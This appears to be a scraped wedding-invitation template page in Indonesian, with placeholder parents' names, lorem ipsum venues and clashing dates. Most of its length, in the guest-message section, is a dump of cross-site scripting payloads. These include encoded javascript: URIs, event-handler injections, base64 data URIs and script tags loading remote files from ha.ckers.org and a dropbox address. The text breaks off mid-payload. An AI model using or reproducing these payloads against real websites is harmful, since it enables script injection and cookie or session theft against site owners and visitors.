The Wedding

Andy & Zhea
Sunday, 03 December 2019

Tentang Kami

Andy Hermawan

Son of
Mr. Father Name & Mrs. Mother Name

Fauziah Ratnasari

Daughter of
Mr. Father Name & Mrs. Mother Name

WE LOVE EACH OTHER

" Dan di antara tanda-tanda kekuasaan-Nya diciptakan-Nya untukmu pasangan hidup dari jenismu sendiri supaya kamu dapat ketenangan hati dan dijadikannya kasih sayang di antara kamu. Sesungguhnya yang demikian menjadi tanda-tanda kebesaran-Nya bagi orang-orang yang berpikir. "

- Q.S. Ar-Rum: 21 -

Our Special

Wedding Event

Akad Nikah

Friday,
01 Desember 201x

08.00 WITA
Until End

Mosque:
lorem ipsum dolor sit amet, consectetur adipiscing elit

Resepsi Pernikahan

Sunday,
03 Desember 201x

08.00 WITA
Until End

Hotel:
lorem ipsum dolor sit amet, consectetur adipiscing elit

  • 00Hari
  • 00Jam
  • 00Menit
  • 00Detik

untuk yang berhalangan hadir, kami tambahkan fitur dibawah ini

Live streaming Akad Nikah dapat disaksikan pada tanggal 25 Oktober 2020 (08.00-10.00)

RSVP

Kirimkan Pesan

UNTUK KAMI BERDUA

07.png
zxcczx
<iframe %00 src=”&Tab;javascript:prompt(1)&Tab;”%00> <svg><style>{font-family&colon;’<iframe/onload=confirm(1)>’ <input/onmouseover=”javaSCRIPT&colon;confirm&lpar;1&rpar;” <sVg><scRipt %00>alert&lpar;1&rpar; {Opera} <img/src=`%00` onerror=this.onerror=confirm(1) <form><isindex formaction=”javascript&colon;confirm(1)” <img src=`%00`&NewLine; onerror=alert(1)&NewLine; <script/&Tab; src=’https://dl.dropbox.com/u/13018058/js.js' /&Tab;></script> <ScRipT 5–0*3+9/3=>prompt(1)</ScRipT giveanswerhere=? <iframe/src=”data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==”> <script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/ &#34;&#62;<h1/onmouseover=’u0061lert(1)’>%00 <iframe/src=”data:text/html,<svg &#111;&#110;load=alert(1)>”> <meta content=”&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)” http-equiv=”refresh”/> <svg><script xlink:href=data&colon;,window.open(‘https://www.google.com/')></script <svg><script x:href=’https://dl.dropbox.com/u/13018058/js.js' {Opera} <meta http-equiv=”refresh” content=”0;url=javascript:confirm(1)”> <iframe src=javascript&colon;alert&lpar;document&period;location&rpar;> <form><a href=”javascript:u0061lert&#x28;1&#x29;”>X </script><img/*%00/src=”worksinchrome&colon;prompt&#x28;1&#x29;”/%00*/onerror=’eval(src)’> <img/&#09;&#10;&#11; src=`~` onerror=prompt(1)> <form><iframe &#09;&#10;&#11; src=”javascript&#58;alert(1)”&#11;&#10;&#09;;> <a href=”data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==”&#09;&#10;&#11;>X</a http://www.google<script .com>alert(document.location)</script <a&#32;href&#61;&#91;&#00;&#93;”&#00; onmouseover=prompt&#40;1&#41;&#47;&#47;”>XYZ</a <img/src=@&#32;&#13; onerror = prompt(‘&#49;’) <style/onload=prompt&#40;’&#88;&#83;&#83;’&#41; <script ^__^>alert(String.fromCharCode(49))</script ^__^ </style &#32;><script &#32; :-(>/**/alert(document.location)/**/</script &#32; 🙁 &#00;</form><input type&#61;”date” onfocus=”alert(1)”> <form><textarea &#13; onkeyup=’u0061u006Cu0065u0072u0074&#x28;1&#x29;’> <script /***/>/***/confirm(‘uFF41uFF4CuFF45uFF52uFF54u1455uFF11u1450’)/***/</script /***/ <iframe srcdoc=’&lt;body onload=prompt&lpar;1&rpar;&gt;’> <a href=”javascript:void(0)” onmouseover=&NewLine;javascript:alert(1)&NewLine;>X</a> <script ~~~>alert(0%0)</script ~~~> <style/onload=&lt;! — &#09;&gt;&#10;alert&#10;&lpar;1&rpar;> <///style///><span %2F onmousemove=’alert&lpar;1&rpar;’>SPAN <img/src=’http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(1) &#34;&#62;<svg><style>{-o-link-source&colon;’<body/onload=confirm(1)>’ &#13;<blink/&#13; onmouseover=pr&#x6F;mp&#116;(1)>OnMouseOver {Firefox & Opera} <marquee onstart=’javascript:alert&#x28;1&#x29;’>^__^ <div/style=”width:expression(confirm(1))”>X</div> {IE7} <iframe/%00/ src=javaSCRIPT&colon;alert(1) //<form/action=javascript&#x3A;alert&lpar;document&period;cookie&rpar;><input/type=’submit’>// /*iframe/src*/<iframe/src=”<iframe/src=@”/onload=prompt(1) /*iframe/src*/> //| <script //| src=’https://dl.dropbox.com/u/13018058/js.js'> //| </script //| </font>/<svg><style>{src&#x3A;’<style/onload=this.onload=confirm(1)>’</font>/</style> <a/href=”javascript:&#13; javascript:prompt(1)”><input type=”X”> </plaintext></|><plaintext/onmouseover=prompt(1) </svg>’’<svg><script ‘AQuickBrownFoxJumpsOverTheLazyDog’>alert&#x28;1&#x29; {Opera} <a href=”javascript&colon;u0061&#x6C;&#101%72t&lpar;1&rpar;”><button> <div onmouseover=’alert&lpar;1&rpar;’>DIV</div> <iframe style=”xg-p:absolute;top:0;left:0;width:100%;height:100%” onmouseover=”prompt(1)”> <a href=”jAvAsCrIpT&colon;alert&lpar;1&rpar;”>X</a> <embed src=”http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> <object data=”http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> <var onmouseover=”prompt(1)”>On Mouse Over</var> <a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a> <img src=”/” =_=” title=”onerror=’prompt(1)’”> <%<! — ‘%><script>alert(1);</script → <script src=”data:text/javascript,alert(1)”></script> <iframe/src //onload = prompt(1) <iframe/onreadystatechange=alert(1) <svg/onload=alert(1) <input value=<><iframe/src=javascript:confirm(1) <input type=”text” value=`` <div/onmouseover=’alert(1)’>X</div> http://www.<script>alert(1)</script .com <iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe> <svg><script ?>alert(1) <iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe> <img src=`xx:xx`onerror=alert(1)> <meta http-equiv=”refresh” content=”0;javascript&colon;alert(1)”/> <math><a xlink:href=”//jsfiddle.net/t846h/”>click <embed code=”http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always> <svg contentScriptType=text/vbs><script>MsgBox+1 <a href=”data:text/html;base64_,<svg/onload=u0061&#x6C;&#101%72t(1)>”>X</a <iframe/onreadystatechange=u0061u006Cu0065u0072u0074(‘u0061’) worksinIE> <script>~’u0061' ; u0074u0068u0072u006Fu0077 ~ u0074u0068u0069u0073. u0061u006Cu0065u0072u0074(~’u0061')</script U+ <script/src=”data&colon;text%2Fju0061vu0061script,u0061lert(‘u0061’)”></script a=u0061 & /=%2F <script/src=data&colon;text/ju0061vu0061&#115&#99&#114&#105&#112&#116,u0061%6C%65%72%74(/XSS/)></script <object data=javascript&colon;u0061&#x6C;&#101%72t(1)> <script>+-+-1-+-+alert(1)</script> <body/onload=&lt;! — &gt;&#10alert(1)> <script itworksinallbrowsers>/*<script* */alert(1)</script <img src ?itworksonchrome?/onerror = alert(1) <svg><script>//&NewLine;confirm(1);</script </svg> <svg><script onlypossibleinopera:-)> alert(1) <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe <script x> alert(1) </script 1=2 <div/onmouseover=’alert(1)’> style=”x:”> ←`<img/src=` onerror=alert(1)> — !> <script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script> <div style=”xg-p:absolute;top:0;left:0;width:100%;height:100%” onmouseover=”prompt(1)” onclick=”alert(1)”>x</button> “><img src=x onerror=window.open(‘https://www.google.com/');> <form><button formaction=javascript&colon;alert(1)>CLICKME <math><a xlink:href=”//jsfiddle.net/t846h/”>click <object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object> <iframe src=”data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E”></iframe> <a href=”data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a> <SCRIPT>String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41)</SCRIPT> ‘;alert(String.fromCharCode(88,83,83))//’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//–></SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> <IMG “””><SCRIPT>alert(“XSS”)</SCRIPT>”> <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> <IMG SRC=”jav ascript:alert(‘XSS’);”> <IMG SRC=”jav&#x09;ascript:alert(‘XSS’);”> <<SCRIPT>alert(“XSS”);//<</SCRIPT> %253cscript%253ealert(1)%253c/script%253e “><s”%2b”cript>alert(document.cookie)</script> foo<script>alert(1)</script> <scr<script>ipt>alert(1)</scr</script>ipt> <IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;> <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041> <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> <BODY BACKGROUND=”javascript:alert(‘XSS’)”> <BODY ONLOAD=alert(‘XSS’)> <INPUT TYPE=”IMAGE” SRC=”javascript:alert(‘XSS’);”> <IMG SRC=”javascript:alert(‘XSS’)” <iframe src=http://ha.ckers.org/scriptlet.html < javascript:alert(“hellox worldss”) <img src=”javascript:alert(‘XSS’);”> <img src=javascript:alert(&quot;XSS&quot;)> <”’;alert(String.fromCharCode(88,83,83))//’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))// →</SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> <META HTTP-EQUIV=”refresh” CONTENT=”0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K”> <IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME> <EMBED SRC=”data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==” type=”image/svg+xml” AllowScriptAccess=”always”></EMBED> <SCRIPT a=”>” SRC=”http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=”>” ‘’ SRC=”http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT “a=’>’” SRC=”http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=”>’>” SRC=”http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://ha.ckers.org/xss.js"></SCRIPT> <<SCRIPT>alert(“XSS”);//<</SCRIPT> <”’;alert(String.fromCharCode(88,83,83))//’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))// →</SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> ‘;alert(String.fromCharCode(88,83,83))//’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))// →</SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))<?/SCRIPT>&submit.x=27&submit.y=9&cmd=search <script>alert(“hellox worldss”)</script>&safe=high&cx=006665157904466893121:su_tzknyxug&cof=FORID:9#510 <script>alert(“XSS”);</script>&search=1 0&q=’;alert(String.fromCharCode(88,83,83))//’;alert%2?8String.fromCharCode(88,83,83))//”;alert(String.fromCharCode?(88,83,83))//”;alert(String.fromCharCode(88,83,83)%?29// →</SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83%?2C83))</SCRIPT>&submit-frmGoogleWeb=Web+Search <h1><font color=blue>hellox worldss</h1> <BODY ONLOAD=alert(‘hellox worldss’)> <input onfocus=write(XSS) autofocus> <input onblur=write(XSS) autofocus><input autofocus> <body onscroll=alert(XSS)><br><br><br><br><br><br>…<br><br><br><br><input autofocus> <form><button formaction=”javascript:alert(XSS)”>lol <! — <img src=” →<img src=x onerror=alert(XSS)//”> <![><img src=”]><img src=x onerror=alert(XSS)//”> <style><img src=”</style><img src=x onerror=alert(XSS)//”> <? foo=”><script>alert(1)</script>”> <! foo=”><script>alert(1)</script>”> </ foo=”><script>alert(1)</script>”> <? foo=”><x foo=’?><script>alert(1)</script>’>”> <! foo=”[[[Inception]]”><x foo=”]foo><script>alert(1)</script>”> <% foo><x foo=”%><script>alert(123)</script>”> <div style=”font-family:’foo&#10;;color:red;’;”>LOL LOL<style>*{/*all*/color/*all*/:/*all*/red/*all*/;/[0]*IE,Safari*[0]/color:green;color:bl/*IE*/ue;}</style> <script>({0:#0=alert/#0#/#0#(0)})</script> <svg xmlns=”http://www.w3.org/2000/svg">LOL<script>alert(123)</script></svg> &lt;SCRIPT&gt;alert(/XSS/&#46;source)&lt;/SCRIPT&gt; ”;alert(‘XSS’);// &lt;/TITLE&gt;&lt;SCRIPT&gt;alert(”XSS”);&lt;/SCRIPT&gt; &lt;INPUT TYPE=”IMAGE” SRC=”javascript&#058;alert(‘XSS’);”&gt; &lt;BODY BACKGROUND=”javascript&#058;alert(‘XSS’)”&gt; &lt;BODY ONLOAD=alert(‘XSS’)&gt; &lt;IMG DYNSRC=”javascript&#058;alert(‘XSS’)”&gt; &lt;IMG LOWSRC=”javascript&#058;alert(‘XSS’)”&gt; &lt;BGSOUND SRC=”javascript&#058;alert(‘XSS’);”&gt; &lt;BR SIZE=”&{alert(‘XSS’)}”&gt; &lt;LAYER SRC=”http&#58;//ha&#46;ckers&#46;org/scriptlet&#46;html”&gt;&lt;/LAYER&gt; &lt;LINK REL=”stylesheet” HREF=”javascript&#058;alert(‘XSS’);”&gt; &lt;LINK REL=”stylesheet” HREF=”http&#58;//ha&#46;ckers&#46;org/xss&#46;css”&gt; &lt;STYLE&gt;@import’http&#58;//ha&#46;ckers&#46;org/xss&#46;css’;&lt;/STYLE&gt; &lt;META HTTP-EQUIV=”Link” Content=”&lt;http&#58;//ha&#46;ckers&#46;org/xss&#46;css&gt;; REL=stylesheet”&gt; &lt;STYLE&gt;BODY{-moz-binding&#58;url(”http&#58;//ha&#46;ckers&#46;org/xssmoz&#46;xml#xss”)}&lt;/STYLE&gt; &lt;XSS STYLE=”behavior&#58; url(xss&#46;htc);”&gt; &lt;STYLE&gt;li {list-style-image&#58; url(”javascript&#058;alert(‘XSS’)”);}&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS &lt;IMG SRC=’vbscript&#058;msgbox(”XSS”)’&gt; &lt;IMG SRC=”mocha&#58;&#91;code&#93;”&gt; &lt;IMG SRC=”livescript&#058;&#91;code&#93;”&gt; žscriptualert(EXSSE)ž/scriptu &lt;META HTTP-EQUIV=”refresh” CONTENT=”0;url=javascript&#058;alert(‘XSS’);”&gt; &lt;META HTTP-EQUIV=”refresh” CONTENT=”0;url=data&#58;text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K”&gt; &lt;META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http&#58;//;URL=javascript&#058;alert(‘XSS’);” &lt;IFRAME SRC=”javascript&#058;alert(‘XSS’);”&gt;&lt;/IFRAME&gt; &lt;FRAMESET&gt;&lt;FRAME SRC=”javascript&#058;alert(‘XSS’);”&gt;&lt;/FRAMESET&gt; &lt;TABLE BACKGROUND=”javascript&#058;alert(‘XSS’)”&gt; &lt;TABLE&gt;&lt;TD BACKGROUND=”javascript&#058;alert(‘XSS’)”&gt; &lt;DIV STYLE=”background-image&#58; url(javascript&#058;alert(‘XSS’))”&gt; &lt;DIV STYLE=”background-image&#58;00750072006C0028'006a006100760061007300630072006900700074003a0061006c0065007200740028&#46;10270058&#46;1053005300270029'0029”&gt; &lt;DIV STYLE=”background-image&#58; url(javascript&#058;alert(‘XSS’))”&gt; &lt;DIV STYLE=”width&#58; expression(alert(‘XSS’));”&gt; &lt;STYLE&gt;@import’javascript&#58;alert(”XSS”)’;&lt;/STYLE&gt; &lt;IMG STYLE=”xss&#58;expr/*XSS*/ession(alert(‘XSS’))”&gt; &lt;XSS STYLE=”xss&#58;expression(alert(‘XSS’))”&gt; exp/*&lt;A STYLE=’noxss&#58;noxss(”*//*”); xss&#58;ex&#x2F;*XSS*//*/*/pression(alert(”XSS”))’&gt; &lt;STYLE TYPE=”text/javascript”&gt;alert(‘XSS’);&lt;/STYLE&gt; &lt;STYLE&gt;&#46;XSS{background-image&#58;url(”javascript&#058;alert(‘XSS’)”);}&lt;/STYLE&gt;&lt;A CLASS=XSS&gt;&lt;/A&gt; &lt;STYLE type=”text/css”&gt;BODY{background&#58;url(”javascript&#058;alert(‘XSS’)”)}&lt;/STYLE&gt; &lt;! — &#91;if gte IE 4&#93;&gt; &lt;SCRIPT&gt;alert(‘XSS’);&lt;/SCRIPT&gt; &lt;!&#91;endif&#93; — &gt; &lt;BASE HREF=”javascript&#058;alert(‘XSS’);//”&gt; &lt;OBJECT TYPE=”text/x-scriptlet” DATA=”http&#58;//ha&#46;ckers&#46;org/scriptlet&#46;html”&gt;&lt;/OBJECT&gt; &lt;OBJECT classid=clsid&#58;ae24fdae-03c6–11d1–8b76–0080c744f389&gt;&lt;param name=url value=javascript&#058;alert(‘XSS’)&gt;&lt;/OBJECT&gt; &lt;EMBED SRC=”http&#58;//ha&#46;ckers&#46;org/xss&#46;swf” AllowScriptAccess=”always”&gt;&lt;/EMBED&gt; &lt;EMBED SRC=”data&#58;image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==” type=”image/svg+xml” AllowScriptAccess=”always”&gt;&lt;/EMBED&gt; a=”get”; b=”URL(””; c=”javascript&#058;”; d=”alert(‘XSS’);”)”; eval(a+b+c+d); &lt;HTML xmlns&#58;xss&gt;&lt;?import namespace=”xss” implementation=”http&#58;//ha&#46;ckers&#46;org/xss&#46;htc”&gt;&lt;xss&#58;xss&gt;XSS&lt;/xss&#58;xss&gt;&lt;/HTML&gt; &lt;XML ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;!&#91;CDATA&#91;&lt;IMG SRC=”javas&#93;&#93;&gt;&lt;!&#91;CDATA&#91;cript&#58;alert(‘XSS’);”&gt;&#93;&#93;&gt; &lt;/C&gt;&lt;/X&gt;&lt;/xml&gt;&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt; &lt;XML ID=”xss”&gt;&lt;I&gt;&lt;B&gt;&lt;IMG SRC=”javas&lt;! — — &gt;cript&#58;alert(‘XSS’)”&gt;&lt;/B&gt;&lt;/I&gt;&lt;/XML&gt; &lt;SPAN DATASRC=”#xss” DATAFLD=”B” DATAFORMATAS=”HTML”&gt;&lt;/SPAN&gt; &lt;XML SRC=”xsstest&#46;xml” ID=I&gt;&lt;/XML&gt; &lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt; &lt;HTML&gt;&lt;BODY&gt; &lt;?xml&#58;namespace prefix=”t” ns=”urn&#58;schemas-microsoft-com&#58;time”&gt; &lt;?import namespace=”t” implementation=”#default#time2”&gt; &lt;t&#58;set attributeName=”innerHTML” to=”XSS&lt;SCRIPT DEFER&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;”&gt; &lt;/BODY&gt;&lt;/HTML&gt; &lt;SCRIPT SRC=”http&#58;//ha&#46;ckers&#46;org/xss&#46;jpg”&gt;&lt;/SCRIPT&gt; &lt;! — #exec cmd=”/bin/echo ‘&lt;SCR’” — &gt;&lt;! — #exec cmd=”/bin/echo ‘IPT SRC=http&#58;//ha&#46;ckers&#46;org/xss&#46;js&gt;&lt;/SCRIPT&gt;’” — &gt; &lt;? echo(‘&lt;SCR)’; echo(‘IPT&gt;alert(”XSS”)&lt;/SCRIPT&gt;’); ?&gt; &lt;IMG SRC=”http&#58;//www&#46;thesiteyouareon&#46;com/somecommand&#46;php?somevariables=maliciouscode”&gt; Redirect 302 /a&#46;jpg http&#58;//victimsite&#46;com/admin&#46;asp&deleteuser &lt;META HTTP-EQUIV=”Set-Cookie” Content=”USERID=&lt;SCRIPT&gt;alert(‘XSS’)&lt;/SCRIPT&gt;”&gt; &lt;HEAD&gt;&lt;META HTTP-EQUIV=”CONTENT-TYPE” CONTENT=”text/html; charset=UTF-7”&gt; &lt;/HEAD&gt;+ADw-SCRIPT+AD4-alert(‘XSS’);+ADw-/SCRIPT+AD4- &lt;SCRIPT a=”&gt;” SRC=”http&#58;//ha&#46;ckers&#46;org/xss&#46;js”&gt;&lt;/SCRIPT&gt; &lt;SCRIPT =”&gt;” SRC=”http&#58;//ha&#46;ckers&#46;org/xss&#46;js”&gt;&lt;/SCRIPT&gt; &lt;SCRIPT a=”&gt;” ‘’ SRC=”http&#58;//ha&#46;ckers&#46;org/xss&#46;js”&gt;&lt;/SCRIPT&gt; &lt;SCRIPT ”a=’&gt;’” SRC=”http&#58;//ha&#46;ckers&#46;org/xss&#46;js”&gt;&lt;/SCRIPT&gt; &lt;SCRIPT a=`&gt;` SRC=”http&#58;//ha&#46;ckers&#46;org/xss&#46;js”&gt;&lt;/SCRIPT&gt; &lt;SCRIPT a=”&gt;’&gt;” SRC=”http&#58;//ha&#46;ckers&#46;org/xss&#46;js”&gt;&lt;/SCRIPT&gt; &lt;SCRIPT&gt;document&#46;write(”&lt;SCRI”);&lt;/SCRIPT&gt;PT SRC=”http&#58;//ha&#46;ckers&#46;org/xss&#46;js”&gt;&lt;/SCRIPT&gt; &lt;A HREF=”http&#58;//66&#46;102&#46;7&#46;147/”&gt;XSS&lt;/A&gt; &lt;A HREF=”http&#58;//%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D”&gt;XSS&lt;/A&gt; &lt;A HREF=”http&#58;//1113982867/”&gt;XSS&lt;/A&gt; &lt;A HREF=”http&#58;//0x42&#46;0x0000066&#46;0x7&#46;0x93/”&gt;XSS&lt;/A&gt; &lt;A HREF=”http&#58;//0102&#46;0146&#46;0007&#46;00000223/”&gt;XSS&lt;/A&gt; &lt;A HREF=”htt p&#58;//6 6&#46;000146&#46;0x7&#46;147/”&gt;XSS&lt;/A&gt; &lt;A HREF=”//www&#46;google&#46;com/”&gt;XSS&lt;/A&gt; &lt;A HREF=”//google”&gt;XSS&lt;/A&gt; &lt;A HREF=”http&#58;//ha&#46;ckers&#46;org@google”&gt;XSS&lt;/A&gt; &lt;A HREF=”http&#58;//google&#58;ha&#46;ckers&#46;org”&gt;XSS&lt;/A&gt; &lt;A HREF=”http&#58;//google&#46;com/”&gt;XSS&lt;/A&gt; &lt;A HREF=”http&#58;//www&#46;google&#46;com&#46;/”&gt;XSS&lt;/A&gt; &lt;A HREF=”javascript&#058;document&#46;location=’http&#58;//www&#46;google&#46;com/’”&gt;XSS&lt;/A&gt; &lt;A HREF=”http&#58;//www&#46;gohttp&#58;//www&#46;google&#46;com/ogle&#46;com/”&gt;XSS&lt;/A&gt; &lt; %3C &lt &lt; &LT &LT; &#60 &#060 &#0060 &#00060 &#000060 &#0000060 &lt; &#x3c &#x03c &#x003c &#x0003c &#x00003c &#x000003c &#x3c; &#x03c; &#x003c; &#x0003c; &#x00003c; &#x000003c; &#X3c &#X03c &#X003c &#X0003c &#X00003c &#X000003c &#X3c; &#X03c; &#X003c; &#X0003c; &#X00003c; &#X000003c; &#x3C &#x03C &#x003C &#x0003C &#x00003C &#x000003C &#x3C; &#x03C; &#x003C; &#x0003C; &#x00003C; &#x000003C; &#X3C &#X03C &#X003C &#X0003C &#X00003C &#X000003C &#X3C; &#X03C; &#X003C; &#X0003C; &#X00003C; &#X000003C; x3c x3C u003c u003C &lt;iframe src=http&#58;//ha&#46;ckers&#46;org/scriptlet&#46;html&gt; &lt;IMG SRC=”javascript&#058;alert(‘XSS’)” &lt;SCRIPT SRC=//ha&#46;ckers&#46;org/&#46;js&gt; &lt;SCRIPT SRC=http&#58;//ha&#46;ckers&#46;org/xss&#46;js?&lt;B&gt; &lt;&lt;SCRIPT&gt;alert(”XSS”);//&lt;&lt;/SCRIPT&gt; &lt;SCRIPT/SRC=”http&#58;//ha&#46;ckers&#46;org/xss&#46;js”&gt;&lt;/SCRIPT&gt; &lt;BODY onload!#$%&()*~+-_&#46;,&#58;;?@&#91;/|&#93;^`=alert(”XSS”)&gt; &lt;SCRIPT/XSS SRC=”http&#58;//ha&#46;ckers&#46;org/xss&#46;js”&gt;&lt;/SCRIPT&gt; &lt;IMG SRC=” javascript&#058;alert(‘XSS’);”&gt; perl -e ‘print ”&lt;SCR0IPT&gt;alert(”XSS”)&lt;/SCR0IPT&gt;”;’ &gt; out perl -e ‘print ”&lt;IMG SRC=java0script&#058;alert(”XSS”)&gt;”;’ &gt; out &lt;IMG SRC=”jav&#x0D;ascript&#058;alert(‘XSS’);”&gt; &lt;IMG SRC=”jav&#x0A;ascript&#058;alert(‘XSS’);”&gt; &lt;IMG SRC=”jav&#x09;ascript&#058;alert(‘XSS’);”&gt; &lt;IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29&gt; &lt;IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041&gt; &lt;IMG SRC=javascript&#058;alert(‘XSS’)&gt; &lt;IMG 